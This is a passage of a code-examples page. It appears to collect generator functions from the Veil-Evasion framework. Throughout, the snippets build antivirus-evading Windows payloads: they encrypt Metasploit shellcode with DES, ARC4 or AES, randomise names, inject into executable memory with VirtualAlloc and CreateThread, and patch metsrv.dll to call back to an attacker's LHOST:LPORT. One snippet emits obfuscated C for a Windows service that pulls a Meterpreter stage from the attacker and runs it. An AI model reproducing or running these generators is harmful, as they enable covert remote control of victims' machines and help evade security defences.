		PayloadCode += RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
		PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
		PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
		PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
		PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
		PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
		PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
		PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))'
		
		if self.required_options["use_pyherion"][0].lower() == "y":
			PayloadCode = crypters.pyherion(PayloadCode)
		
		return PayloadCode
Example #20
0
    def generate(self):
        if self.required_options["inject_method"][0].lower() == "virtual":
            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate()
        
            # Generate Random Variable Names
            ShellcodeVariableName = randomizer.randomString()
            RandPtr = randomizer.randomString()
            RandBuf = randomizer.randomString()
            RandHt = randomizer.randomString()
        
            # Create Payload code
            PayloadCode = 'import ctypes\n'
            PayloadCode += ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n'
            PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
            PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
            PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
            PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
            PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

            if self.required_options["use_pyherion"][0].lower() == "y":
                PayloadCode = crypters.pyherion(PayloadCode)

            return PayloadCode

        else:
            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate()

            # Generate Random Variable Names
            RandShellcode = randomizer.randomString()
            RandReverseShell = randomizer.randomString()
            RandMemoryShell = randomizer.randomString()
        
            PayloadCode = 'from ctypes import *\n'
            PayloadCode += RandReverseShell + ' = \"' + Shellcode + '\"\n'
            PayloadCode += RandMemoryShell + ' = create_string_buffer(' + RandReverseShell + ', len(' + RandReverseShell + '))\n'
            PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
            PayloadCode += RandShellcode + '()'
    
            if self.required_options["use_pyherion"][0].lower() == "y":
                PayloadCode = crypters.pyherion(PayloadCode)

            return PayloadCode
Example #21
0
    def generate(self):
        
        if os.path.exists(settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll"):
            metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll"
        else:
            metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.dll"
            
        f = open(metsrvPath, 'rb')
        meterpreterDll = f.read()
        f.close()
        
        # lambda function used for patching the metsvc.dll
        dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):]

        # patch the metsrv.dll header
        headerPatch = "\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\xb0"
        headerPatch += "\x0e\x00\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50\xff\xd0"
        headerPatch += "\x68\xe0\x1d\x2a\x0a\x68\x05\x00\x00\x00\x50\xff\xd3\x00\x00\x00"
        meterpreterDll = dllReplace(meterpreterDll,0,headerPatch)

        # patch in the default user agent string
        userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
        userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
        meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString)

        # turn off SSL
        sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
        sslString = "METERPRETER_TRANSPORT_HTTP\x00"
        meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString)

        # replace the URL/port of the handler
        urlIndex = meterpreterDll.index("https://" + ("X" * 256))
        urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + randomizer.randomString(16) + "/\x00"
        meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString)
        
        # replace the expiration timeout with the default value of 300
        expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661))
        expirationTimeout = struct.pack('<I', 604800)
        meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout)

        # replace the communication timeout with the default value of 300
        communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f))
        communicationTimeout = struct.pack('<I', 300)
        meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout)

        # compress/base64 encode the dll
        compressedDll = helpers.deflate(meterpreterDll)
        
        # actually build out the payload
        payloadCode = ""
        
        # traditional void pointer injection
        if self.required_options["inject_method"][0].lower() == "void":

            # doing void * cast
            payloadCode += "from ctypes import *\nimport base64,zlib\n"

            randInflateFuncName = randomizer.randomString()
            randb64stringName = randomizer.randomString()
            randVarName = randomizer.randomString()

            # deflate function
            payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
            payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
            payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"

            randVarName = randomizer.randomString()
            randFuncName = randomizer.randomString()
            
            payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
            payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
            payloadCode += randFuncName+"()\n"

        # VirtualAlloc() injection
        else:

            payloadCode += 'import ctypes,base64,zlib\n'

            randInflateFuncName = randomizer.randomString()
            randb64stringName = randomizer.randomString()
            randVarName = randomizer.randomString()
            randPtr = randomizer.randomString()
            randBuf = randomizer.randomString()
            randHt = randomizer.randomString()

            # deflate function
            payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
            payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
            payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"

            payloadCode += randVarName + " = bytearray(" + randInflateFuncName + "(\"" + compressedDll + "\"))\n"
            payloadCode += randPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ randVarName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
            payloadCode += randBuf + ' = (ctypes.c_char * len(' + randVarName + ')).from_buffer(' + randVarName + ')\n'
            payloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + randPtr + '),' + randBuf + ',ctypes.c_int(len(' + randVarName + ')))\n'
            payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
            payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n'

        
        if self.required_options["use_pyherion"][0].lower() == "y":
            payloadCode = crypters.pyherion(payloadCode)

        return payloadCode
Example #22
0
    def generate(self):
        if self.required_options["inject_method"][0].lower() == "virtual":

            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate()

            # Generate Random Variable Names
            RandPtr = randomizer.randomString()
            RandBuf = randomizer.randomString()
            RandHt = randomizer.randomString()
            ShellcodeVariableName = randomizer.randomString()
            RandIV = randomizer.randomString()
            RandARCKey = randomizer.randomString()
            RandARCPayload = randomizer.randomString()
            RandEncShellCodePayload = randomizer.randomString()

            # Set IV Value and ARC Key
            iv = randomizer.randomKey(8)
            ARCKey = randomizer.randomKey(8)

            # Create DES Object and encrypt our payload
            arc4main = ARC4.new(ARCKey)
            EncShellCode = arc4main.encrypt(Shellcode)

            PayloadCode = 'from Crypto.Cipher import ARC4\n'
            PayloadCode += 'import ctypes\n'
            PayloadCode += RandIV + ' = \'' + iv + '\'\n'
            PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
            PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
            PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode(
                "string_escape") + '\'\n'
            PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
            PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
            PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
            PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
            PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
            PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

            if self.required_options["use_pyherion"][0].lower() == "y":
                PayloadCode = crypters.pyherion(PayloadCode)

            return PayloadCode

        else:
            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate()

            # Generate Random Variable Names
            RandPtr = randomizer.randomString()
            RandBuf = randomizer.randomString()
            RandHt = randomizer.randomString()
            ShellcodeVariableName = randomizer.randomString()
            RandIV = randomizer.randomString()
            RandARCKey = randomizer.randomString()
            RandARCPayload = randomizer.randomString()
            RandEncShellCodePayload = randomizer.randomString()
            RandShellcode = randomizer.randomString()
            RandReverseShell = randomizer.randomString()
            RandMemoryShell = randomizer.randomString()

            # Set IV Value and ARC Key
            iv = randomizer.randomKey(8)
            ARCKey = randomizer.randomKey(8)

            # Create DES Object and encrypt our payload
            arc4main = ARC4.new(ARCKey)
            EncShellCode = arc4main.encrypt(Shellcode)

            PayloadCode = 'from Crypto.Cipher import ARC4\n'
            PayloadCode += 'from ctypes import *\n'
            PayloadCode += RandIV + ' = \'' + iv + '\'\n'
            PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
            PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
            PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode(
                "string_escape") + '\'\n'
            PayloadCode += ShellcodeVariableName + ' = ' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
            PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
            PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
            PayloadCode += RandShellcode + '()'

            if self.required_options["use_pyherion"][0].lower() == "y":
                PayloadCode = crypters.pyherion(PayloadCode)

            return PayloadCode
Example #23
0
    def generate(self):

        winsock_init_name = randomizer.randomString()
        punt_name = randomizer.randomString()
        recv_all_name = randomizer.randomString()
        wsconnect_name = randomizer.randomString()

        # the real includes needed
        includes = [
            "#include <stdio.h>", "#include <stdlib.h>",
            "#include <windows.h>", "#include <string.h>"
        ]

        # max length string for obfuscation
        global_max_string_length = 10000
        max_string_length = random.randint(1, global_max_string_length)
        max_num_strings = 10000

        # TODO: add in more string processing functions
        randName1 = randomizer.randomString()  # reverse()
        randName2 = randomizer.randomString()  # doubles characters
        stringModFunctions = [
            (randName1,
             "char* %s(const char *t) { int length= strlen(t); int i; char* t2 = (char*)malloc((length+1) * sizeof(char)); for(i=0;i<length;i++) { t2[(length-1)-i]=t[i]; } t2[length] = '\\0'; return t2; }"
             % (randName1)),
            (randName2,
             "char* %s(char* s){ char *result =  malloc(strlen(s)*2+1); int i; for (i=0; i<strlen(s)*2+1; i++){ result[i] = s[i/2]; result[i+1]=s[i/2];} result[i] = '\\0'; return result; }"
             % (randName2))
        ]

        random.shuffle(stringModFunctions)

        # obsufcation - "logical nop" string generation functions
        randString1 = randomizer.randomString(50)
        randName1 = randomizer.randomString()
        randVar1 = randomizer.randomString()
        randName2 = randomizer.randomString()
        randVar2 = randomizer.randomString()
        randVar3 = randomizer.randomString()
        randName3 = randomizer.randomString()
        randVar4 = randomizer.randomString()
        randVar5 = randomizer.randomString()
        stringGenFunctions = [
            (randName1,
             "char* %s(){ char *%s = %s(\"%s\"); return strstr( %s, \"%s\" );}"
             % (randName1, randVar1, stringModFunctions[0][0], randString1,
                randVar1, randString1[len(randString1) / 2])),
            (randName2,
             "char* %s(){ char %s[%s/2], %s[%s/2]; strcpy(%s,\"%s\"); strcpy(%s,\"%s\"); return %s(strcat( %s, %s)); }"
             % (randName2, randVar2, max_string_length, randVar3,
                max_string_length, randVar2, randomizer.randomString(50),
                randVar3, randomizer.randomString(50),
                stringModFunctions[1][0], randVar2, randVar3)),
            (randName3,
             "char* %s() { char %s[%s] = \"%s\"; char *%s = strupr(%s); return strlwr(%s); }"
             % (randName3, randVar4, max_string_length,
                randomizer.randomString(50), randVar5, randVar4, randVar5))
        ]
        random.shuffle(stringGenFunctions)

        # obfuscation - add in our fake includes
        fake_includes = [
            "#include <sys/timeb.h>", "#include <time.h>", "#include <math.h>",
            "#include <signal.h>", "#include <stdarg.h>",
            "#include <limits.h>", "#include <assert.h>"
        ]
        t = random.randint(1, 7)
        for x in xrange(1, random.randint(1, 7)):
            includes.append(fake_includes[x])

        # obsufcation - shuffle up our real and fake includes
        random.shuffle(includes)

        code = "#define _WIN32_WINNT 0x0500\n"
        code += "#include <winsock2.h>\n"
        code += "\n".join(includes) + "\n"

        # real - service related headers (check the stub)
        hStatusName = randomizer.randomString()
        serviceHeaders = [
            "SERVICE_STATUS ServiceStatus;",
            "SERVICE_STATUS_HANDLE %s;" % (hStatusName),
            "void  ServiceMain(int argc, char** argv);",
            "void  ControlHandler(DWORD request);"
        ]
        random.shuffle(serviceHeaders)

        code += "\n".join(serviceHeaders)

        # obsufcation - string mod functions
        code += stringModFunctions[0][1] + "\n"
        code += stringModFunctions[1][1] + "\n"

        # real - build the winsock_init function
        wVersionRequested_name = randomizer.randomString()
        wsaData_name = randomizer.randomString()
        code += "void %s() {" % (winsock_init_name)
        code += "WORD %s = MAKEWORD(%s, %s); WSADATA %s;" % (
            wVersionRequested_name, helpers.obfuscateNum(
                2, 4), helpers.obfuscateNum(2, 4), wsaData_name)
        code += "if (WSAStartup(%s, &%s) < 0) { WSACleanup(); exit(1);}}\n" % (
            wVersionRequested_name, wsaData_name)

        # first logical nop string function
        code += stringGenFunctions[0][1] + "\n"

        # real - build punt function
        my_socket_name = randomizer.randomString()
        code += "void %s(SOCKET %s) {" % (punt_name, my_socket_name)
        code += "closesocket(%s);" % (my_socket_name)
        code += "WSACleanup();"
        code += "exit(1);}\n"

        # obsufcation - second logical nop string function
        code += stringGenFunctions[1][1] + "\n"

        # real - build recv_all function
        my_socket_name = randomizer.randomString()
        buffer_name = randomizer.randomString()
        len_name = randomizer.randomString()
        code += "int %s(SOCKET %s, void * %s, int %s){" % (
            recv_all_name, my_socket_name, buffer_name, len_name)
        code += "int slfkmklsDSA=0;int rcAmwSVM=0;"
        code += "void * startb = %s;" % (buffer_name)
        code += "while (rcAmwSVM < %s) {" % (len_name)
        code += "slfkmklsDSA = recv(%s, (char *)startb, %s - rcAmwSVM, 0);" % (
            my_socket_name, len_name)
        code += "startb += slfkmklsDSA; rcAmwSVM   += slfkmklsDSA;"
        code += "if (slfkmklsDSA == SOCKET_ERROR) %s(%s);} return rcAmwSVM; }\n" % (
            punt_name, my_socket_name)

        # obsufcation - third logical nop string function
        code += stringGenFunctions[2][1] + "\n"

        # real - build wsconnect function
        target_name = randomizer.randomString()
        sock_name = randomizer.randomString()
        my_socket_name = randomizer.randomString()
        code += "SOCKET %s() { struct hostent * %s; struct sockaddr_in %s; SOCKET %s;" % (
            wsconnect_name, target_name, sock_name, my_socket_name)
        code += "%s = socket(AF_INET, SOCK_STREAM, 0);" % (my_socket_name)
        code += "if (%s == INVALID_SOCKET) %s(%s);" % (
            my_socket_name, punt_name, my_socket_name)
        code += "%s = gethostbyname(\"%s\");" % (
            target_name, self.required_options["LHOST"][0])
        code += "if (%s == NULL) %s(%s);" % (target_name, punt_name,
                                             my_socket_name)
        code += "memcpy(&%s.sin_addr.s_addr, %s->h_addr, %s->h_length);" % (
            sock_name, target_name, target_name)
        code += "%s.sin_family = AF_INET;" % (sock_name)
        code += "%s.sin_port = htons(%s);" % (
            sock_name,
            helpers.obfuscateNum(int(self.required_options["LPORT"][0]), 32))
        code += "if ( connect(%s, (struct sockaddr *)&%s, sizeof(%s)) ) %s(%s);" % (
            my_socket_name, sock_name, sock_name, punt_name, my_socket_name)
        code += "return %s;}\n" % (my_socket_name)

        # real - main() method for the service code
        serviceName = randomizer.randomString()
        code += "void main() { SERVICE_TABLE_ENTRY ServiceTable[2];"
        serviceTableEntries = [
            "ServiceTable[0].lpServiceName = \"%s\";" % (serviceName),
            "ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;",
            "ServiceTable[1].lpServiceName = NULL;",
            "ServiceTable[1].lpServiceProc = NULL;"
        ]
        random.shuffle(serviceTableEntries)
        code += "\n".join(serviceTableEntries)
        code += "StartServiceCtrlDispatcher(ServiceTable);}\n"

        # real - service status options for us to shuffle
        serviceStatusOptions = [
            "ServiceStatus.dwWin32ExitCode = 0;",
            "ServiceStatus.dwCurrentState = SERVICE_START_PENDING;",
            "ServiceStatus.dwWaitHint = 0;",
            "ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;",
            "ServiceStatus.dwServiceSpecificExitCode = 0;",
            "ServiceStatus.dwCheckPoint = 0;",
            "ServiceStatus.dwServiceType = SERVICE_WIN32;"
        ]
        random.shuffle(serviceStatusOptions)

        # real - serviceMain() code
        code += "void ServiceMain(int argc, char** argv) {\n"
        code += "\n".join(serviceStatusOptions)

        code += "%s = RegisterServiceCtrlHandler( \"%s\", (LPHANDLER_FUNCTION)ControlHandler);" % (
            hStatusName, serviceName)
        code += "if (%s == (SERVICE_STATUS_HANDLE)0) return;" % (hStatusName)
        code += "ServiceStatus.dwCurrentState = SERVICE_RUNNING;"
        code += "SetServiceStatus (%s, &ServiceStatus);" % (hStatusName)

        code += "while (ServiceStatus.dwCurrentState == SERVICE_RUNNING) {\n"

        # obsufcation - random variable names
        size_name = randomizer.randomString()
        buffer_name = randomizer.randomString()
        function_name = randomizer.randomString()
        my_socket_name = randomizer.randomString()
        count_name = randomizer.randomString()

        # obsufcation - necessary declarations
        char_array_name_1 = randomizer.randomString()
        number_of_strings_1 = random.randint(1, max_num_strings)
        char_array_name_2 = randomizer.randomString()
        number_of_strings_2 = random.randint(1, max_num_strings)
        char_array_name_3 = randomizer.randomString()
        number_of_strings_3 = random.randint(1, max_num_strings)

        # real - necessary declarations
        code += "ULONG32 %s;" % (size_name)
        code += "char * %s;" % (buffer_name)
        code += "int i;"
        code += "char* %s[%s];" % (char_array_name_1, number_of_strings_1)
        code += "void (*%s)();" % (function_name)

        # obsufcation - malloc our first string obfuscation array
        code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" % (
            number_of_strings_1, char_array_name_1,
            random.randint(max_string_length, global_max_string_length))

        code += "%s();" % (winsock_init_name)
        code += "char* %s[%s];" % (char_array_name_2, number_of_strings_2)
        code += "SOCKET %s = %s();" % (my_socket_name, wsconnect_name)

        # obsufcation - malloc our second string obfuscation array
        code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" % (
            number_of_strings_2, char_array_name_2,
            random.randint(max_string_length, global_max_string_length))

        # real - receive the 4 byte size from the handler
        code += "int %s = recv(%s, (char *)&%s, %s, 0);" % (
            count_name, my_socket_name, size_name, helpers.obfuscateNum(4, 2))
        # real - punt the socket if something goes wrong
        code += "if (%s != %s || %s <= 0) %s(%s);" % (
            count_name, helpers.obfuscateNum(
                4, 2), size_name, punt_name, my_socket_name)

        # real - virtual alloc space for the meterpreter .dll
        code += "%s = VirtualAlloc(0, %s + %s, MEM_COMMIT, PAGE_EXECUTE_READWRITE);" % (
            buffer_name, size_name, helpers.obfuscateNum(5, 2))

        # obsufcation - declare space for our 3 string obfuscation array
        code += "char* %s[%s];" % (char_array_name_3, number_of_strings_3)

        # obsufcation - first string obfuscation method
        code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" % (
            number_of_strings_1, char_array_name_1, stringGenFunctions[0][0])

        # real - check if the buffer received is null, if so punt the socket
        code += "if (%s == NULL) %s(%s);" % (buffer_name, punt_name,
                                             my_socket_name)

        # real - prepend some buffer magic to push the socket number onto the stack
        code += "%s[0] = 0xBF;" % (buffer_name)
        # real-  copy the 4 magic bytes into the buffer
        code += "memcpy(%s + 1, &%s, %s);" % (buffer_name, my_socket_name,
                                              helpers.obfuscateNum(4, 2))

        # obsufcation - malloc our third string obfuscation array
        code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" % (
            number_of_strings_3, char_array_name_3,
            random.randint(max_string_length, global_max_string_length))

        # obsufcation - second string obfuscation method
        code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" % (
            number_of_strings_2, char_array_name_2, stringGenFunctions[1][0])

        # real - receive all data from the socket
        code += "%s = %s(%s, %s + %s, %s);" % (
            count_name, recv_all_name, my_socket_name, buffer_name,
            helpers.obfuscateNum(5, 2), size_name)
        code += "%s = (void (*)())%s;" % (function_name, buffer_name)
        code += "%s();" % (function_name)

        # obsufcation - third string obfuscation method (never called)
        code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" % (
            number_of_strings_3, char_array_name_3, stringGenFunctions[2][0])

        code += "} return; }\n"

        # service control handler code
        code += """void ControlHandler(DWORD request) 
    { 
        switch(request) 
        { 
            case SERVICE_CONTROL_STOP: 
                ServiceStatus.dwWin32ExitCode = 0; 
                ServiceStatus.dwCurrentState  = SERVICE_STOPPED; 
                SetServiceStatus (%s, &ServiceStatus);
                return; 
            case SERVICE_CONTROL_SHUTDOWN: 
                ServiceStatus.dwWin32ExitCode = 0; 
                ServiceStatus.dwCurrentState  = SERVICE_STOPPED; 
                SetServiceStatus (%s, &ServiceStatus);
                return; 
            default:
                break;
        } 
        SetServiceStatus (%s,  &ServiceStatus);
        return; 
    } 
    """ % (hStatusName, hStatusName, hStatusName)

        return code
Example #24
0
    def generate(self):

        if os.path.exists(settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll"):
            metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll"
        else:
            metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.dll"

        f = open(metsrvPath, "rb")
        meterpreterDll = f.read()
        f.close()

        # lambda function used for patching the metsvc.dll
        dllReplace = lambda dll, ind, s: dll[:ind] + s + dll[ind + len(s) :]

        # patch the metsrv.dll header
        headerPatch = "\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\xb0"
        headerPatch += "\x0e\x00\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50\xff\xd0"
        headerPatch += "\x68\xe0\x1d\x2a\x0a\x68\x05\x00\x00\x00\x50\xff\xd3\x00\x00\x00"
        meterpreterDll = dllReplace(meterpreterDll, 0, headerPatch)

        # patch in the default user agent string
        userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
        userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
        meterpreterDll = dllReplace(meterpreterDll, userAgentIndex, userAgentString)

        # turn off SSL
        sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
        sslString = "METERPRETER_TRANSPORT_HTTPS\x00"
        meterpreterDll = dllReplace(meterpreterDll, sslIndex, sslString)

        # replace the URL/port of the handler
        urlIndex = meterpreterDll.index("https://" + ("X" * 256))
        urlString = (
            "https://"
            + self.required_options["LHOST"][0]
            + ":"
            + str(self.required_options["LPORT"][0])
            + "/"
            + self.genHTTPChecksum()
            + "_"
            + randomizer.randomString(16)
            + "/\x00"
        )
        meterpreterDll = dllReplace(meterpreterDll, urlIndex, urlString)

        # replace the expiration timeout with the default value of 300
        expirationTimeoutIndex = meterpreterDll.index(struct.pack("<I", 0xB64BE661))
        expirationTimeout = struct.pack("<I", 604800)
        meterpreterDll = dllReplace(meterpreterDll, expirationTimeoutIndex, expirationTimeout)

        # replace the communication timeout with the default value of 300
        communicationTimeoutIndex = meterpreterDll.index(struct.pack("<I", 0xAF79257F))
        communicationTimeout = struct.pack("<I", 300)
        meterpreterDll = dllReplace(meterpreterDll, communicationTimeoutIndex, communicationTimeout)

        # compress/base64 encode the dll
        compressedDll = helpers.deflate(meterpreterDll)

        # actually build out the payload
        payloadCode = ""

        # traditional void pointer injection
        if self.required_options["inject_method"][0].lower() == "void":

            # doing void * cast
            payloadCode += "from ctypes import *\nimport base64,zlib\n"

            randInflateFuncName = randomizer.randomString()
            randb64stringName = randomizer.randomString()
            randVarName = randomizer.randomString()

            # deflate function
            payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + "):\n"
            payloadCode += "\t" + randVarName + " = base64.b64decode( " + randb64stringName + " )\n"
            payloadCode += "\treturn zlib.decompress( " + randVarName + " , -15)\n"

            randVarName = randomizer.randomString()
            randFuncName = randomizer.randomString()

            payloadCode += randVarName + " = " + randInflateFuncName + '("' + compressedDll + '")\n'
            payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
            payloadCode += randFuncName + "()\n"

        # VirtualAlloc() injection
        else:

            payloadCode += "import ctypes,base64,zlib\n"

            randInflateFuncName = randomizer.randomString()
            randb64stringName = randomizer.randomString()
            randVarName = randomizer.randomString()
            randPtr = randomizer.randomString()
            randBuf = randomizer.randomString()
            randHt = randomizer.randomString()

            # deflate function
            payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + "):\n"
            payloadCode += "\t" + randVarName + " = base64.b64decode( " + randb64stringName + " )\n"
            payloadCode += "\treturn zlib.decompress( " + randVarName + " , -15)\n"

            payloadCode += randVarName + " = bytearray(" + randInflateFuncName + '("' + compressedDll + '"))\n'
            payloadCode += (
                randPtr
                + " = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len("
                + randVarName
                + ")),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n"
            )
            payloadCode += randBuf + " = (ctypes.c_char * len(" + randVarName + ")).from_buffer(" + randVarName + ")\n"
            payloadCode += (
                "ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int("
                + randPtr
                + "),"
                + randBuf
                + ",ctypes.c_int(len("
                + randVarName
                + ")))\n"
            )
            payloadCode += (
                randHt
                + " = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int("
                + randPtr
                + "),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n"
            )
            payloadCode += "ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(" + randHt + "),ctypes.c_int(-1))\n"

        if self.required_options["use_pyherion"][0].lower() == "y":
            payloadCode = crypters.pyherion(payloadCode)

        return payloadCode
Example #25
0
def pyAESVAlloc():
    # Generate Shellcode Using msfvenom
    Shellcode = shellcode.genShellcode()

    # Generate Random Variable Names
    ShellcodeVariableName = randomizer.randomString()
    RandPtr = randomizer.randomString()
    RandBuf = randomizer.randomString()
    RandHt = randomizer.randomString()
    RandDecodeAES = randomizer.randomString()
    RandCipherObject = randomizer.randomString()
    RandDecodedShellcode = randomizer.randomString()
    RandShellCode = randomizer.randomString()
    RandPadding = randomizer.randomString()

    # Set AES Block Size and Padding
    BlockSize = 32
    Padding = '{'

    # Function for Padding Encrypted Text to Fit the Block
    pad = lambda s: s + (BlockSize - len(s) % BlockSize) * Padding

    # Encrypt & Encode or Decrypt & Decode a String
    EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
    DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(Padding)

    # Generate Random AES Key
    secret = aes.aesKey()

    # Create Cipher Object with Generated Secret Key
    cipher = AES.new(secret)

    # Encrypt the String
